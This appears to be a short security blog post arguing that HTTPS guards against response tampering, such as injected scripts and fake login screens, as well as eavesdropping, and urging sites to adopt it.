When we think about HTTP vs. HTTPS, we often focus on the risk to sensitive information. HTTP transmits our data in clear-text, while HTTPS encrypts the data to stop people from snooping. But that is not all that HTTPS does.
What about tampering?
One of the other key aspects of HTTPS is to protect our communication with the server from tampering. In this case, we would be concerned with someone being able to manipulate the responses that are sent back to the user’s browser. While no sensitive information may be intercepted, an attacker could modify the page being returned to inject malicious data.
For example, they could inject malicious JavaScript (Cross-site Scripting) into the response. When the page loads for the user, it would execute this javascript to perform some malicious action. This could result in redirecting the user to a malicious site, installing malware, or even full take over of the system. It could also allow a crafty attacker to rewrite the presentation of the screen to ask for sensitive information. For example, they could show the login screen for a different site that the user uses to try and get them to enter their credentials.
HTTPS also helps you verify that the site you are communicating with is the right one. The certificates used to support HTTPS tie the domain name to the certificate. This helps reduce the chances that someone is in the middle of your connection sniffing your traffic. Most browsers will show an alert when the certificate doesn’t match the domain name. This helps reduce the chances that the user will talk to anyone but who they believe they are talking to.
The browsers have come a long way in helping force HTTPS and reduce any opportunity for any communication over HTTP. If your site isn’t working on HTTPS, this should be fixed right away, even if you don’t think your site is sensitive.
Leave a Reply
You must be logged in to post a comment.